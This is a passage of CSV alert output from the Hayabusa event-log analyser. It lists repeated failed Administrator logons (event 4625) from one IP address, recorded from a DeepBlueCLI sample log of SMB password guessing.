+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.406 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.531 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.038 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.250 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.675 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.716 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.763 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.915 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.177 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 